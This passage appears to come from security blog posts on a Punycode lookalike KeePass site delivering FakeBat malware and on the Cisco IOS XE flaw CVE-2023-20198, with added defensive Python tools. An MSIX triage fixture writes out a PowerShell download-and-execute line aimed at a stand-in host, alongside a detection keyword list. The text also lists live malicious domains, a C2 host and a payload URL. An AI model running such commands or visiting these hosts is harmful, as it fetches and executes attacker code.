Figure 3: The fake KeePass site with a barely noticeable different font

While it is barely noticeable, there is a small cedilla under the ‘k’. We can confirm it by converting the Punycode (ASCII) form of the domain, xn--eepass-vbb[.]info, back to its Unicode form, ķeepass[.]info:


Figure 4: Converting the Punycode domain back to Unicode
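The conversion shown in Figure 4, plus the check an analyst would run over a list of domains from ad or proxy logs, as an added Python example (this is not the article’s or Malwarebytes’ tooling). It decodes xn-- labels with Python’s built-in punycode codec, lists any non-ASCII characters by Unicode name, and collapses diacritics with a simplified confusable skeleton so that ķeepass.info lands on keepass.info. The BRANDS watch list is an assumption; SAMPLE_DOMAINS is constructed from the defanged indicators in this article.

```python
"""Decode internationalized domain names and flag brand lookalikes.

Added example; not the article's or Malwarebytes' tooling. BRANDS is an
assumed watch list, and SAMPLE_DOMAINS reproduces the article's defanged
IoCs (constructed input for the demo at the bottom).
"""
import unicodedata

BRANDS = ["keepass.info"]  # assumed watch list of domains you want to protect

SAMPLE_DOMAINS = [  # constructed from the article's IoC list
    "keepass[.]info",
    "xn--eepass-vbb[.]info",
    "keepasstacking[.]site",
    "756-ads-info[.]xyz",
]


def refang(domain: str) -> str:
    """Turn a defanged IoC like 'xn--eepass-vbb[.]info' back into a hostname."""
    return domain.replace("[.]", ".").strip().lower()


def decode_idn(domain: str) -> str:
    """A-labels (xn--...) to U-labels: recover what the address bar showed."""
    labels = []
    for label in domain.split("."):
        if label.lower().startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def encode_idn(domain: str) -> str:
    """U-labels back to A-labels, for lookups in DNS/proxy logs that store ASCII."""
    labels = []
    for label in domain.split("."):
        if not label.isascii():
            label = "xn--" + label.encode("punycode").decode("ascii")
        labels.append(label)
    return ".".join(labels)


def non_ascii_chars(domain: str):
    """List every non-ASCII character with its code point and Unicode name."""
    return [(c, f"U+{ord(c):04X}", unicodedata.name(c, "?"))
            for c in domain if ord(c) > 127]


def skeleton(domain: str) -> str:
    """Crude confusable skeleton: decompose (NFKD), drop combining marks, lowercase.

    'ķ' (U+0137) decomposes to 'k' + U+0327 COMBINING CEDILLA, so the mark
    falls away and the fake collapses onto the brand. This catches diacritic
    tricks only; whole-script confusables (Cyrillic 'а' for Latin 'a') need
    the UTS #39 confusables table.
    """
    decomposed = unicodedata.normalize("NFKD", domain)
    return "".join(c for c in decomposed if not unicodedata.combining(c)).lower()


def classify(domain: str, brands=BRANDS) -> str:
    """'legitimate', 'lookalike', 'brand-in-name' or 'unrelated' for one domain."""
    shown = decode_idn(refang(domain))
    if shown in brands:
        return "legitimate"
    if skeleton(shown) in brands:
        return "lookalike"
    if any(b.split(".")[0] in skeleton(shown) for b in brands):
        return "brand-in-name"
    return "unrelated"


def triage(domains=SAMPLE_DOMAINS, brands=BRANDS) -> dict:
    """Map each input domain to its verdict; used by the demo and the tests."""
    return {d: classify(d, brands) for d in domains}


if __name__ == "__main__":
    for domain, verdict in triage().items():
        shown = decode_idn(refang(domain))
        print(f"{domain:28} -> {shown:16} {verdict:14} {non_ascii_chars(shown)}")
```

Run it as a script to see each of the article’s domains next to its decoded form and verdict; the round trip through encode_idn() is what you need when the lookalike only appears in logs as its xn-- form.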

Decoy site links to malicious download

While the decoy site is not an exact replica of the real one, it still looks very convincing:


Figure 5: Comparing the legitimate site (left) with the fake one (right)

Victims wanting to download KeePass will retrieve a malicious .msix installer that is digitally signed:


Figure 6: The malicious MSIX installer showing a valid digital signature

Extracting the installer’s content reveals malicious PowerShell code that belongs to the FakeBat malware family:


Figure 7: The contents of the MSIX installer

This script communicates with the malware’s command and control server to register the new victim, then downloads a payload that sets the stage for later hands-on reconnaissance by human threat actors.


Figure 8: Process view showing execution of the MSIX installer
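Because an MSIX package is a zip container, the embedded script can be pulled out and read without ever launching the installer, and a valid Authenticode signature (Figure 6) says nothing about what that script does. The following added Python example (not the article’s tooling) builds a constructed stand-in package in memory, lists its script-like members and flags common download-and-execute PowerShell idioms; the member names, the script text and the keyword list are all illustrative assumptions, not the real sample.

```python
"""Static triage of an MSIX installer without running it.

Added example; not the article's tooling. MSIX packages are zip containers,
so script content can be listed and read offline. build_sample_msix() is a
constructed stand-in that mimics an installer carrying a start script; it is
not the real sample from the article.
"""
import io
import re
import zipfile

SCRIPT_SUFFIXES = (".ps1", ".bat", ".cmd", ".vbs", ".js")
# Illustrative list of PowerShell idioms worth a second look (assumption).
SUSPICIOUS = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|IEX\b|Invoke-Expression|"
    r"-EncodedCommand|Start-Process|Net\.WebClient",
    re.IGNORECASE,
)


def build_sample_msix() -> bytes:
    """Constructed package: manifest, a PSF-style config.json and a start script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", "<Package><Identity Name='Example'/></Package>")
        # The Package Support Framework reads config.json and can run a
        # startScript before the application itself.
        z.writestr("config.json",
                   '{"applications":[{"startScript":{"scriptPath":"setup.ps1"}}]}')
        z.writestr("setup.ps1",
                   "$c = New-Object Net.WebClient\n"
                   "IEX $c.DownloadString('http://example.invalid/stage')\n")
        z.writestr("app/KeePass.exe", b"MZ...")  # placeholder, not a real binary
    return buf.getvalue()


def list_scripts(msix: bytes):
    """Return (member name, text) for every script-like member in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(msix)) as z:
        for info in z.infolist():
            if info.filename.lower().endswith(SCRIPT_SUFFIXES):
                found.append((info.filename, z.read(info).decode("utf-8", "replace")))
    return found


def triage(msix: bytes) -> dict:
    """Summarise what a reviewer should look at before trusting the installer."""
    with zipfile.ZipFile(io.BytesIO(msix)) as z:
        names = z.namelist()
    scripts = list_scripts(msix)
    hits = {name: sorted({m.group(0) for m in SUSPICIOUS.finditer(text)})
            for name, text in scripts}
    return {
        "members": len(names),
        "has_psf_config": "config.json" in names,
        "scripts": [name for name, _ in scripts],
        "suspicious": {name: h for name, h in hits.items() if h},
    }


if __name__ == "__main__":
    report = triage(build_sample_msix())
    for key, value in report.items():
        print(f"{key}: {value}")
    for name, text in list_scripts(build_sample_msix()):
        print(f"--- {name} ---\n{text}")
```

Point triage() at the bytes of a real .msix (open(path, "rb").read()) to get the same summary; anything that combines a start script with a download keyword deserves a sandbox run before the package is allowed near an endpoint.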

A more sophisticated threat

Punycode and internationalized domain names have been used by threat actors for years to phish victims, and this case shows how effective they remain in the context of brand impersonation via malvertising. Users are deceived first by a Google ad that looks entirely legitimate, and then again by a lookalike domain.

As we have noted recently, malvertising via search engines is getting more sophisticated. For end users this means it has become very important to pay close attention to where you download programs from. In a business environment, we recommend that IT admins provide internal repositories from which employees can retrieve software installers safely.

Indicators of Compromise

Ad domain/redirect

keepasstacking[.]site

Fake KeePass site

xn--eepass-vbb[.]info

Malicious KeePass download URL

xn--eepass-vbb[.]info/download/KeePass-2.55-Setup.msix

Malicious KeePass installer

181626fdcff9e8c63bb6e4c601cf7c71e47ae5836632db49f1df827519b01aaa

Malware C2

756-ads-info[.]xyz

Payload

refreshmet[.]com/Package.tar.gpg


Cisco IOS XE vulnerability widely exploited in the wild

An authentication bypass affecting Cisco IOS XE was disclosed on October 16, 2023. Researchers have since found that the vulnerability is being widely exploited in the wild to install implants on affected switches and routers.

Cisco IOS XE is a widely deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The vulnerability at hand is listed as:

CVE-2023-20198 (CVSS score 10 out of 10): Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.

What Cisco did not mention was the scale: researchers who scanned internet-facing Cisco IOS XE web interfaces found thousands of hosts that had already been implanted.

Cisco has also yet to publish a list of affected devices, but if you are using Cisco switches, routers or Wireless LAN Controllers, you should assume they are vulnerable.

The implants that were found enable the attacker to communicate with the compromised device and use that ability to monitor web traffic, perform lateral movement in the network, or use them for a machine-in-the-middle attack.

The Cisco Talos team discovered there were malicious activities correlated with this vulnerability as early as September 18, 2023.

Mitigation

This vulnerability affects Cisco IOS XE Software if the web UI feature is enabled. The web UI feature is enabled through the ip http server or ip http secure-server commands.

To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. If either command is present, the HTTP Server feature is enabled for the system. Note that the include filter is a substring match, so a line such as no ip http secure-server will also be shown; only the commands without the leading no mean the feature is on.

Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.

At the time of writing no patch is available, so protect your organization by disabling the web interface and removing all management interfaces from the internet immediately. That is good advice regardless of this vulnerability.

The Cybersecurity & Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog based on the evidence of active exploitation. This means all Federal Civilian Executive Branch (FCEB) agencies have to verify that instances of the Cisco IOS XE web UI are in compliance with BOD 23-02 (Mitigating the Risk from Internet-Exposed Management Interfaces) and apply mitigations per Cisco’s instructions. For affected products (Cisco IOS XE web UI exposed to the internet or to untrusted networks), organizations must follow Cisco’s instructions to determine whether a system may have been compromised, and immediately report positive findings to CISA before October 20, 2023.

Organizations should look for unexplained or newly created users on devices as evidence of potentially malicious activity relating to this threat. One method to identify whether the implant is present is to run the following command against the device, where {DEVICEIP} is a placeholder for the IP address of the device to check:

curl -k -X POST "https://{DEVICEIP}/webui/logoutconfirm.html?logon_hash=1"

Note: Use the http:// scheme instead if the device is only configured for the insecure web interface (ip http server without ip http secure-server). The -k flag skips certificate verification, which is needed because management interfaces usually present self-signed certificates. If the request returns a hexadecimal string, the implant is present.
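The two checks above, the running-config test and the implant probe, as one added Python example that is neither Cisco’s nor the article’s code. It applies the configuration test to saved show running-config output (anchoring on the command so that no ip http server is not counted), interprets the probe response with the hexadecimal-string rule, and can issue the same POST as the curl command against a list of devices. SAMPLE_CONFIG is constructed; the treatment of ip http active-session-modules none and ip http secure-active-session-modules none follows the wording of Cisco’s advisory and is not described on this page; the min_len guard in classify_response() is an assumption added so that a short numeric body is not mistaken for the implant’s token.

```python
"""Triage helpers for CVE-2023-20198 on Cisco IOS XE.

Added example; not Cisco's or the article's code. Two offline checks plus
one network probe:
  web_ui_status()     - apply the running-config test to saved CLI output
  classify_response() - interpret the body of the implant probe
  check_device()      - issue the probe (POST /webui/logoutconfirm.html?logon_hash=1)
SAMPLE_CONFIG is constructed; device IPs for __main__ come from argv.
"""
import re
import ssl
import sys
import urllib.error
import urllib.request

# What "show running-config | include ip http server|secure|active" surfaces.
# Anchored on the command itself so that "no ip http server" does NOT count.
HTTP_ON = re.compile(r"^\s*ip http server\b")
HTTPS_ON = re.compile(r"^\s*ip http secure-server\b")
# Per Cisco's advisory (not quoted in the article): with these present the
# corresponding listener is on but the vulnerable session modules are off.
HTTP_NO_MODULES = re.compile(r"^\s*ip http active-session-modules none\b")
HTTPS_NO_MODULES = re.compile(r"^\s*ip http secure-active-session-modules none\b")

SAMPLE_CONFIG = """\
! constructed running-config excerpt
hostname edge-rtr1
ip http server
no ip http secure-server
ip http active-session-modules none
end
"""


def web_ui_status(running_config: str) -> dict:
    """Which web UI listeners are on, and whether either is still exploitable."""
    lines = running_config.splitlines()
    http = any(HTTP_ON.match(line) for line in lines)
    https = any(HTTPS_ON.match(line) for line in lines)
    http_exp = http and not any(HTTP_NO_MODULES.match(line) for line in lines)
    https_exp = https and not any(HTTPS_NO_MODULES.match(line) for line in lines)
    return {"http": http, "https": https, "exploitable": http_exp or https_exp}


def classify_response(body: str, min_len: int = 8) -> str:
    """'implant' when the body is a bare hexadecimal string, else 'clean'.

    min_len is an added guard (assumption) so that a short numeric body such
    as a plain-text "404" is not mistaken for the implant's hex token.
    """
    token = body.strip()
    if len(token) >= min_len and re.fullmatch(r"[0-9a-fA-F]+", token):
        return "implant"
    return "clean"


def check_device(ip: str, scheme: str = "https", timeout: float = 5.0) -> str:
    """Run the article's probe against one device (needs network access)."""
    url = f"{scheme}://{ip}/webui/logoutconfirm.html?logon_hash=1"
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # same effect as curl -k: management
    ctx.verify_mode = ssl.CERT_NONE  # interfaces usually have self-signed certs
    req = urllib.request.Request(url, data=b"", method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:   # non-2xx: still inspect the body
        body = err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return "unreachable"
    return classify_response(body)


if __name__ == "__main__":
    # usage: python iosxe_check.py https 192.0.2.10 192.0.2.11
    if len(sys.argv) < 3:
        sys.exit("usage: iosxe_check.py http|https DEVICEIP [DEVICEIP ...]")
    for device in sys.argv[2:]:
        print(f"{device}: {check_device(device, sys.argv[1])}")
```

Pick the scheme per device from web_ui_status(): probe over https:// when ip http secure-server is present and over http:// when only ip http server is. A result of unreachable is not a clean bill of health; it usually means the web UI is not listening on that scheme or is filtered from where you are scanning.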


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.